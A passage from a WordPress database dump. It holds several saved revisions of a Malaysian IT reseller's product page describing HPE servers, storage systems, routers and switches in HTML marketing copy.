09:30:50','',1529,'https://bintara.com.my/blog/2019/10/01/1529-revision-v1/',0,'revision','',0),(3635,1,'2019-10-01 17:31:48','2019-10-01 09:31:48','<h2>SERVER AND SYSTEM</h2><h2 style=\"text-align: center;\"><strong>Rack Servers</strong></h2><p style=\"text-align: center;\">Rack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.</p><h4 style=\"text-align: center;\"><strong>HPE StoreOnce Systems</strong></h4><hr /><p style=\"text-align: center;\">Â <br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-StoreOnce-Systems.png\" alt=\"\" width=\"208\" height=\"156\" /></p><p style=\"text-align: center;\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 8000 Storage</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-8000-Storage.png\" alt=\"\" width=\"232\" height=\"166\" /></p><p style=\"text-align: center;\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesnâ€™t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 9000 Storage</strong></h4>\n<hr />\n&nbsp;\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-9000-Storage.png\" alt=\"\" width=\"222\" height=\"171\" />\n<p style=\"text-align: center;\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads â€“ for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant DL325 Gen10 Server</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL325-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" /></p><p style=\"text-align: center;\">Secure and versatile single socket (1P) 1U AMD EPYCâ„¢ based platform offers an exceptional balance of processor, memory and I/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant DL385 Gen10 Server</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL385-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" /></p><p style=\"text-align: center;\">Hewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.</p><h4 style=\"text-align: center;\"><strong>HPE Apollo 6000 Chassis</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Apollo-6000-Chassis.png\" alt=\"\" width=\"235\" height=\"160\" /></p><p style=\"text-align: center;\">The HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customerâ€™s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Tower Servers</strong></h2><p style=\"text-align: center;\">Lower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant ML110 Gen10 Server</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML110-Gen10-Server.png\" alt=\"\" width=\"226\" height=\"169\" /></p><p style=\"text-align: center;\">The HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businessesâ€™ needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant ML350 Gen10 Server</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML350-Gen10-Server.png\" alt=\"\" width=\"232\" height=\"185\" /></p><p style=\"text-align: center;\">HPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.Â The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>HPE Synergy</strong></h2><p style=\"text-align: center;\">Composable, software-defined infrastructure that speeds application delivery.</p><h4 style=\"text-align: center;\"><strong>HPE Synergy 12000 Frame</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-12000-Frame.png\" alt=\"\" width=\"226\" height=\"170\" /></p><p style=\"text-align: center;\">HPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.</p><h4 style=\"text-align: center;\"><strong>HPE Synergy D3940 Storage Module</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-D3940-Storage-Module.png\" alt=\"\" width=\"222\" height=\"166\" /></p><p style=\"text-align: center;\">The HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Data Storage</strong></h2><p style=\"text-align: center;\">Flash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.</p><h4 style=\"text-align: center;\"><strong>HPE StoreOnce Systems</strong></h4><hr /><p style=\"text-align: center;\">Â <br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-StoreOnce-Systems.png\" alt=\"\" width=\"208\" height=\"156\" /></p><p style=\"text-align: center;\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 8000 Storage</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-8000-Storage.png\" alt=\"\" width=\"232\" height=\"166\" /></p><p style=\"text-align: center;\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesnâ€™t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 9000 Storage</strong></h4>\n<hr />\n&nbsp;\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-9000-Storage.png\" alt=\"\" width=\"222\" height=\"171\" />\n<p style=\"text-align: center;\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads â€“ for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2>NETWORKING</h2><h2 style=\"text-align: center;\"><strong>Router</strong></h2><p style=\"text-align: center;\">Navigate more devices and simplify complex networks with intelligent management of open standards routing.</p><h4 style=\"text-align: center;\"><strong>HPE FLexNetwork MSR95x Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FLexNetwork-MSR95x-Router-Series.png\" alt=\"\" width=\"227\" height=\"171\" /></p><p style=\"text-align: center;\">HPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.</p><h4 style=\"text-align: center;\"><strong>Alcatel-Lucent 7750 Service Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Alcatel-Lucent-7750-Service-Router-Series.png\" alt=\"\" width=\"229\" height=\"171\" /></p><p style=\"text-align: center;\">The Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.</p><h4 style=\"text-align: center;\"><strong>HPE FlexNetwork MSR93x Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FlexNetwork-MSR93x-Router-Series.png\" alt=\"\" width=\"232\" height=\"188\" /></p><p style=\"text-align: center;\">HPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Switches</strong></h2><h4 style=\"text-align: center;\"><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\" alt=\"\" width=\"219\" height=\"165\" /></p><p style=\"text-align: center;\">The HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.</p><h4 style=\"text-align: center;\"><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\" alt=\"\" width=\"244\" height=\"184\" /></p><p style=\"text-align: center;\">HPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100/50/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100/50GbE spine switches. It is optimized for data center hot/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><p style=\"text-align: center;\">To discover more, please click the button below or contact us to discuss your needs.</p><p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','HPE','','inherit','closed','closed','','1529-revision-v1','','','2019-10-01 17:31:48','2019-10-01 09:31:48','',1529,'https://bintara.com.my/blog/2019/10/01/1529-revision-v1/',0,'revision','',0),(3637,1,'2019-10-01 17:34:26','2019-10-01 09:34:26','<h2>SERVER AND SYSTEM</h2><h2 style=\"text-align: center;\"><strong>Rack Servers</strong></h2><p style=\"text-align: center;\">Rack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant DL325 Gen10 Server</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL325-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" /></p><p style=\"text-align: center;\">Secure and versatile single socket (1P) 1U AMD EPYCâ„¢ based platform offers an exceptional balance of processor, memory and I/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant DL385 Gen10 Server</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL385-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" /></p><p style=\"text-align: center;\">Hewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.</p><h4 style=\"text-align: center;\"><strong>HPE Apollo 6000 Chassis</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Apollo-6000-Chassis.png\" alt=\"\" width=\"235\" height=\"160\" /></p><p style=\"text-align: center;\">The HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customerâ€™s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Tower Servers</strong></h2><p style=\"text-align: center;\">Lower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant ML110 Gen10 Server</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML110-Gen10-Server.png\" alt=\"\" width=\"226\" height=\"169\" /></p><p style=\"text-align: center;\">The HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businessesâ€™ needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant ML350 Gen10 Server</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML350-Gen10-Server.png\" alt=\"\" width=\"232\" height=\"185\" /></p><p style=\"text-align: center;\">HPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.Â The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>HPE Synergy</strong></h2><p style=\"text-align: center;\">Composable, software-defined infrastructure that speeds application delivery.</p><h4 style=\"text-align: center;\"><strong>HPE Synergy 12000 Frame</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-12000-Frame.png\" alt=\"\" width=\"226\" height=\"170\" /></p><p style=\"text-align: center;\">HPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.</p><h4 style=\"text-align: center;\"><strong>HPE Synergy D3940 Storage Module</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-D3940-Storage-Module.png\" alt=\"\" width=\"222\" height=\"166\" /></p><p style=\"text-align: center;\">The HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Data Storage</strong></h2><p style=\"text-align: center;\">Flash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.</p><h4 style=\"text-align: center;\"><strong>HPE StoreOnce Systems</strong></h4><hr /><p style=\"text-align: center;\">Â <br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-StoreOnce-Systems.png\" alt=\"\" width=\"208\" height=\"156\" /></p><p style=\"text-align: center;\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 8000 Storage</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-8000-Storage.png\" alt=\"\" width=\"232\" height=\"166\" /></p><p style=\"text-align: center;\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesnâ€™t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 9000 Storage</strong></h4>\n<hr />\n&nbsp;\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-9000-Storage.png\" alt=\"\" width=\"222\" height=\"171\" />\n<p style=\"text-align: center;\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads â€“ for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2>NETWORKING</h2><h2 style=\"text-align: center;\"><strong>Router</strong></h2><p style=\"text-align: center;\">Navigate more devices and simplify complex networks with intelligent management of open standards routing.</p><h4 style=\"text-align: center;\"><strong>HPE FLexNetwork MSR95x Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FLexNetwork-MSR95x-Router-Series.png\" alt=\"\" width=\"227\" height=\"171\" /></p><p style=\"text-align: center;\">HPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.</p><h4 style=\"text-align: center;\"><strong>Alcatel-Lucent 7750 Service Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Alcatel-Lucent-7750-Service-Router-Series.png\" alt=\"\" width=\"229\" height=\"171\" /></p><p style=\"text-align: center;\">The Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.</p><h4 style=\"text-align: center;\"><strong>HPE FlexNetwork MSR93x Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FlexNetwork-MSR93x-Router-Series.png\" alt=\"\" width=\"232\" height=\"188\" /></p><p style=\"text-align: center;\">HPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Switches</strong></h2><h4 style=\"text-align: center;\"><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\" alt=\"\" width=\"219\" height=\"165\" /></p><p style=\"text-align: center;\">The HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.</p><h4 style=\"text-align: center;\"><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\" alt=\"\" width=\"244\" height=\"184\" /></p><p style=\"text-align: center;\">HPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100/50/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100/50GbE spine switches. It is optimized for data center hot/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><p style=\"text-align: center;\">To discover more, please click the button below or contact us to discuss your needs.</p><p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','HPE','','inherit','closed','closed','','1529-revision-v1','','','2019-10-01 17:34:26','2019-10-01 09:34:26','',1529,'https://bintara.com.my/blog/2019/10/01/1529-revision-v1/',0,'revision','',0),(3638,1,'2019-10-01 17:36:05','2019-10-01 09:36:05','<h2>SERVER AND SYSTEM</h2><h2 style=\"text-align: center;\"><strong>Rack Servers</strong></h2><p style=\"text-align: center;\">Rack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant DL325 Gen10 Server</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL325-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" /></p><p style=\"text-align: center;\">Secure and versatile single socket (1P) 1U AMD EPYCâ„¢ based platform offers an exceptional balance of processor, memory and I/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 